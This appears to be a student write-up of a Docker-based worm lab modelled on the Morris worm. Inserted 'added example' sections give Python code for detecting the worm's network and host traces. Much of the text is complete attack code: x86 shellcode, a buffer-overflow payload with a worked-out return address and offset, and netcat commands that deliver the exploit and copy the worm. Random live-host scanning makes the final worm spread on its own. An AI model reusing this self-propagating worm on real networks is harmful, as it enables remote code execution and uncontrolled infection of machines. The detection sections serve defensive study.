Task 1: Get Familiar with the Lab Setup

Run docker-compose build && docker-compose up in the nano directory and in the map directory respectively

to bring up the lab environment.

Errors appear partway through; rerun the commands repeatedly until they succeed.


Task 2: Attack the First Target

First run the following command (disables address-space randomization on the host):

 sudo /sbin/sysctl -w kernel.randomize_va_space=0

A skeleton program is provided in the Labsetup/worm folder. We complete this code step by step, one piece per task. In this task we mainly complete the createBadfile() function, which generates the malicious payload for the buffer-overflow attack, and launch the attack on the first target. Any host can be chosen as the first target; the code hard-codes the target 10.151.0.71 (line ➀), and students are free to change it. In later tasks the target IP addresses are generated instead of hard-coded.

4.1 The Skeleton Code

#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint

# You can use this shellcode to run any command you want
shellcode= (
   "\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
   "\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
   "\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
   "\xff\xff\xff"
   "AAAABBBBCCCCDDDD" 
   "/bin/bash*"
   "-c*"
   # You can put your commands in the following three lines. 
   # Separating the commands using semicolons.
   # Make sure you don't change the length of each line. 
   # The * in the 3rd line will be replaced by a binary zero.
   " echo '(^_^) Shellcode is running (^_^)';                   "
   " ping -q 1.2.3.4;                                          "
   "                                                           *"
   "123456789012345678901234567890123456789012345678901234567890"
   # The last line (above) serves as a ruler, it is not used
).encode('latin-1')


# Create the badfile (the malicious payload)
def createBadfile():
   content = bytearray(0x90 for i in range(500))
   ##################################################################
   # Put the shellcode at the end
   content[500-len(shellcode):] = shellcode

   ret    = 0xffffd608  # Need to change
   offset = 116  # Need to change

   content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
   ##################################################################

   # Save the binary code to file
   with open('badfile', 'wb') as f:
      f.write(content)


# Find the next victim (return an IP address).
# Check to make sure that the target is alive. 
def getNextTarget():
   return '10.151.0.71'


############################################################### 

print("The worm has arrived on this host ^_^", flush=True)

# This is for visualization. It sends an ICMP echo message to 
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)

# Create the badfile 
createBadfile()

# Launch the attack on other servers
while True:
    targetIP = getNextTarget()

    # Send the malicious payload to the target host
    print(f"**********************************", flush=True)
    print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
    print(f"**********************************", flush=True)
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)

    # Give the shellcode some time to run on the target host
    time.sleep(1)


    # Sleep for 10 seconds before attacking another host
    time.sleep(10) 

    # Remove this line if you want to continue attacking others
    exit(0)

4.2 Creating the badfile

Run the following on any container or on the host:

echo hello | nc -w2 10.151.0.71 9090

The server's feedback can be seen in the dcup terminal (this debugging output lowers the difficulty of the buffer-overflow exploit, since the values needed below can be read from it).


ret    = 0xffffd608  # Need to change
offset = 116  # Need to change

The two values are derived from the server's output as follows:

ret    = ebp + 16
offset = ebp - buffer_address + 4 = 116

4.3 The Shellcode

Send badfile from any container:

cat badfile | nc 10.151.0.71 9090

The output shows that the malicious code was executed successfully.


The container can be restarted with the following command:

docker restart <container ID>

Task 3: Self Duplication

The shellcode is responsible for making the target machine listen on port 8080 to receive the file:

   " echo '(^_^) Shellcode is running (^_^)';                   "
   " nc -nvl 8080 > /tmp/worm.py                                "
   "                                                           *"
   "123456789012345678901234567890123456789012345678901234567890"

This part of the worm is responsible for sending the worm to the target machine, completing the transfer of the worm file:

while True:
    # Give the shellcode some time to run on the target host
    time.sleep(1)

    # Send the worm file to the target machine, completing the copy
    subprocess.run([f"cat worm.py | nc -w3 {targetIP} 8080"], shell=True)
    # Sleep for 10 seconds before attacking another host
    time.sleep(10)

The file transfer succeeds.

Task 4: Propagation

Following the lecture slides, getNextTarget() picks a random address in the 10.x.0.y range and pings it once to check that the host is alive:

def getNextTarget():
    while True:
        x = randint(151, 155)
        y = randint(70, 80)
        ip = f'10.{x}.0.{y}'
        output = subprocess.check_output(f"ping -q -c1 -W1 {ip}",shell=True)
        result = output.find(b'1 received')
        if result == -1 :
            print(f"{ip} is not alive", flush = True)
        else:
            print(f"{ip} is alive,attack start", flush =True)
            return ip

After completing the worm program, run the demonstration.

Execution fails with the following error:

subprocess.CalledProcessError: Command 'ping -q -c1 -W1 10.151.0.76' returned non-zero exit status 1.

Use try/except to keep the program from stopping when ping returns a non-zero exit status.

Because the ping timings differ, the hosts do not blink at the same moment, but the process count reaches 450, more than 200 above the normal 200, which proves that worm.py is running on every docker container.
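The two network behaviours described in Task 3 and Task 4 (a single source pinging many random 10.x.0.y addresses, then a connection to port 9090 followed by one to port 8080 on the same host) are exactly what a network monitor should look for. The following added example, which is not part of the lab's skeleton code or this write-up, shows the detection logic over a constructed set of flow records; the record format "<time> <src> <dst> <proto> <dport>" and the sample flows are assumptions.

```python
"""Detect the worm's network footprint from flow records (added example).

Assumed, constructed record format (not from the lab):
    "<t> <src> <dst> <proto> <dport>"   where dport is '-' for ICMP.
Two behaviours are checked:
  * ping sweep: one source ICMP-probes many distinct hosts in a short window
  * infection chain: TCP to 9090 (exploit) followed by TCP to 8080 (worm copy)
"""
from collections import defaultdict

# Constructed sample flows; not captured from the lab network.
SAMPLE_FLOWS = """\
0 10.151.0.71 10.152.0.73 icmp -
1 10.151.0.71 10.153.0.79 icmp -
2 10.151.0.71 10.155.0.74 icmp -
3 10.151.0.71 10.154.0.77 icmp -
4 10.151.0.71 10.151.0.76 icmp -
5 10.151.0.71 10.152.0.75 icmp -
6 10.151.0.71 10.152.0.75 tcp 9090
8 10.151.0.71 10.152.0.75 tcp 8080
20 10.160.0.99 10.151.0.71 tcp 9090
"""


def parse_flows(text):
    """Parse the constructed flow format into (t, src, dst, proto, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, src, dst, proto, dport = line.split()
        flows.append((int(t), src, dst, proto, None if dport == '-' else int(dport)))
    return flows


def find_ping_sweeps(flows, min_targets=5, window=10):
    """Return the set of sources that ICMP-probe at least min_targets distinct
    hosts within any window of `window` seconds."""
    probes = defaultdict(list)
    for t, src, dst, proto, _ in flows:
        if proto == 'icmp':
            probes[src].append((t, dst))
    sweeps = set()
    for src, events in probes.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            targets = {d for t, d in events[i:] if t - t0 <= window}
            if len(targets) >= min_targets:
                sweeps.add(src)
                break
    return sweeps


def find_infection_chains(flows, exploit_port=9090, copy_port=8080, window=10):
    """Return (src, dst) pairs where a TCP connection to exploit_port is followed
    within `window` seconds by a connection to copy_port on the same host."""
    exploits = defaultdict(list)
    for t, src, dst, proto, dport in flows:
        if proto == 'tcp' and dport == exploit_port:
            exploits[(src, dst)].append(t)
    chains = set()
    for t, src, dst, proto, dport in flows:
        if proto == 'tcp' and dport == copy_port:
            if any(0 <= t - te <= window for te in exploits[(src, dst)]):
                chains.add((src, dst))
    return chains


if __name__ == '__main__':
    flows = parse_flows(SAMPLE_FLOWS)
    print("ping sweeps from:", find_ping_sweeps(flows))
    print("infection chains:", find_infection_chains(flows))
```

The thresholds (five distinct ICMP targets in ten seconds, and an 8080 connection within ten seconds of a 9090 one) follow the timing in the write-up, where the worm sleeps one second between the exploit and the copy and ten seconds between victims; a lone connection to 9090 with no follow-up on 8080, as from the second source in the sample, is not reported.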


Task 5: Preventing Self Infection

To prevent a machine from being infected repeatedly, I create a marker file (exist.txt) to indicate that the program has already run on this host.

Add the following code at the start of the program:

if os.path.exists("/tmp/exist.txt"):
    print("exist")
    sys.exit(0)
    
else:
    with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
        print(f)

The process count now stabilises, which means no duplicate copies of the program are running.
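The artifacts this write-up relies on (the /tmp/exist.txt marker, the worm copy at /tmp/worm.py, the nc listener on 8080, the delivery to port 9090 and the visualisation ping to 1.2.3.4) double as host-side indicators of compromise. The following added example, which is not part of the lab code, checks a constructed file list and a constructed ps-style process listing for them; the input formats and the sample lines are assumptions, and nothing here reads the real filesystem.

```python
"""Host-side check for the worm artifacts named in this write-up (added example).

Inputs are constructed: a list of paths present on the host and lines from a
ps-style listing. The regexes match the command lines the worm uses.
"""
import re

# Indicators taken from the write-up.
FILE_INDICATORS = {"/tmp/exist.txt", "/tmp/worm.py"}
PROCESS_INDICATORS = [
    (re.compile(r"\bnc\b.*\s-n?v?l\b.*\b8080\b"), "nc listener on 8080 (worm copy receiver)"),
    (re.compile(r"python3?\s+/tmp/worm\.py"), "worm copy running from /tmp"),
    (re.compile(r"\bping\b.*\b1\.2\.3\.4\b"), "visualisation ping to 1.2.3.4"),
    (re.compile(r"\bnc\b.*\b9090\b"), "payload delivery to port 9090"),
]


def check_host(files, ps_lines):
    """Return a list of (kind, description) findings for the given host state."""
    findings = []
    for path in sorted(FILE_INDICATORS & set(files)):
        findings.append(("file", path))
    for line in ps_lines:
        for pattern, description in PROCESS_INDICATORS:
            if pattern.search(line):
                findings.append(("process", description))
    return findings


# Constructed sample host state (not taken from a lab container).
SAMPLE_FILES = ["/tmp/exist.txt", "/tmp/worm.py", "/etc/hostname"]
SAMPLE_PS = [
    "root 1 0 /bin/bash",
    "root 77 1 python3 /tmp/worm.py",
    "root 80 77 sh -c ping -q -i2 1.2.3.4",
    "root 92 77 sh -c cat badfile | nc -w3 10.152.0.75 9090",
    "root 95 1 nc -nvl 8080",
]

CLEAN_FILES = ["/etc/hostname"]
CLEAN_PS = ["root 1 0 /bin/bash", "root 42 1 sshd"]


if __name__ == '__main__':
    for kind, description in check_host(SAMPLE_FILES, SAMPLE_PS):
        print(f"[{kind}] {description}")
```

The marker file is the weakest of the indicators on its own, since a clean host could carry a file of that name, so the check reports each indicator separately and lets the reader weigh the combination.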


Task 6: Releasing the Worm on the Mini Internet

dcbuild
./z_start.sh

Bring up the environment, then release the complete worm program:

#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint

# You can use this shellcode to run any command you want
shellcode= (
   "\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
   "\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
   "\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
   "\xff\xff\xff"
   "AAAABBBBCCCCDDDD" 
   "/bin/bash*"
   "-c*"
   # You can put your commands in the following three lines. 
   # Separating the commands using semicolons.
   # Make sure you don't change the length of each line. 
   # The * in the 3rd line will be replaced by a binary zero.
   " echo '(^_^) Shellcode is running (^_^)';                   "
   " nc -nvl 8080 > /tmp/worm.py;                               "
   " python3 /tmp/worm.py                                      *"
   "123456789012345678901234567890123456789012345678901234567890"
   # The last line (above) serves as a ruler, it is not used
).encode('latin-1')

if os.path.exists("/tmp/exist.txt"):
    print("exist")
    sys.exit(0)
    
else:
    with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
        print(f)
        
# Create the badfile (the malicious payload)
def createBadfile():
   content = bytearray(0x90 for i in range(500))
   ##################################################################
   # Put the shellcode at the end
   content[500-len(shellcode):] = shellcode

   ret    = 0xffffd608  # Need to change
   offset = 116  # Need to change

   content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
   ##################################################################

   # Save the binary code to file
   with open('badfile', 'wb') as f:
      f.write(content)


# Find the next victim (return an IP address).
# Check to make sure that the target is alive. 
def getNextTarget():
    while True:
        x = randint(151, 180)
        y = randint(70, 100)
        ip = f'10.{x}.0.{y}'
        try:
            output =  subprocess.check_output(f"ping -q -c1 -W1 {ip}", shell=True)
            result = output.find(b'1 received')
            if result == -1 :
                print(f"{ip} is not alive", flush = True)
            else:
                print(f"{ip} is alive,attack start", flush =True)
                return ip
        except subprocess.CalledProcessError as e:
            print(e)
            

############################################################### 

print("The worm has arrived on this host ^_^", flush=True)

# This is for visualization. It sends an ICMP echo message to 
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)

# Create the badfile 
createBadfile()

# Launch the attack on other servers
while True:
    targetIP = getNextTarget()

    # Send the malicious payload to the target host
    print(f"**********************************", flush=True)
    print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
    print(f"**********************************", flush=True)
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)

    # Give the shellcode some time to run on the target host
    time.sleep(1)

    # Send the worm file to the target machine, completing the copy
    subprocess.run([f"cat worm.py | nc -w5 {targetIP} 8080"], shell=True)
    # Sleep for 10 seconds before attacking another host
    time.sleep(10) 

    # The exit(0) from the skeleton is removed here so the worm keeps attacking others

The machine only has 2 GB of memory, so the run hung partway through. qaq

But the program itself is definitely fine!
